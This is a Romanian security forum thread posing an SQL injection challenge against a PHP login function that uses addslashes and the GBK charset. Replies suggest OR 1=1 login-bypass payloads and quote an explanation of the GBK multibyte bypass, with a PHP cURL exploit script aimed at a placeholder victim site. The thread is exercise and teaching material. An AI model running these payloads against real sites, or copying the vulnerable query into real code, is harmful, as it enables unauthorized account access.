Jump to content
Hertz

SQLI Challenge 1

Recommended Posts

Se da codul sursa al unei pagini.

Care ar fii queryul ideal pentru extragerea datelor / logarea ca Admin.


<?php

function asvsmysql_login($username, $password)
{
$username = addslashes($username);
$password = md5($password);

$db = new Database();
$db->setHost('localhost');
$db->setDatabase(ADDSLASH_DATABASE);
$db->setUser(ADDSLASH_USERNAME);
$db->setPassword(ADDSLASH_PASSWORD);
if (false === $db->connect()) {
return htmlDisplayError('Conectare nereusita.');
}

$db->query("SET NAMES GBK");
$db->query("SET CHARACTER SET GBK");

$query = "SELECT username FROM users WHERE username='$username' AND password='$password'";

if (false === ($result = $db->queryFirst($query))) {
return htmlDisplayError('User/Parola gresite..');
}

if ($result['username'] !== 'Admin') {
return htmlDisplayError('Esti logat,dar nu ca Admin.');
}

return htmlDisplayMessage('Esti logat,felicitari!');
}

?>

Link to comment
Share on other sites

username='$username' si password='$password' - Nu trebuia cumva sa folosesti ghilimele duble?

Si nu vad cum s-ar putea apela functia din browser... Sa presupunem ca folosim GET pentru username si password:

username=Admin

password=' OR 1=1'

Ceva de genul. Login bypass.

Edit: Nu e bine, nu m-am uitat la inceput. :)

Edited by Nytro
Link to comment
Share on other sites

misto ideea.

Tentant ar fi de construit un site simplu cu codul de mai sus... dar presupun ca aflarea solutiei presupune doar citirea codului?

...

m-as baga mai tarziu (da nu stiu daca am timp azi) sa bag pe un host sursa, o baza de date si sa ofer situl pentru incercari. Imi place ideea.

PS cred ca voiai sa zici ' OR 1 OR ' sau ' OR 1=1 OR '

Link to comment
Share on other sites

am incercat destule, intr-adevar ideea ar fi sa ajungi la query gen

FROM users WHERE username='admin' OR 1 OR 'ceva' AND password=''";

addslashes iti transforma '\ si se pare ca singura metoda viabila este utilizatul caracterelor de UTF8 (situl e intr-o limba asiatica deci primeste, cum a zis michee)

Problema e ca mi-au esuat toate incercarile, trebuie testat programul separat, din ochi la cea mai mica greseala se comporta la fel.

Link to comment
Share on other sites

Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc.

SQL Injection - Hakipedia

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:


<?php
$url = "http://www.victimsite.com/login.php";
$ref = "http://www.victimsite.com/index.php";
$session = "PHPSESSID=abcdefg01234567890abcdefg";

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_REFERER, $ref );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );
curl_setopt( $ch, CURLOPT_COOKIE, $session );
curl_setopt( $ch, CURLOPT_POST, TRUE );
curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" .
chr(0xbf) . chr(0x27) .
"OR 1=1/*&submit=1" );

$data = curl_exec( $ch );

print( $data );
curl_close( $ch );
?>

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...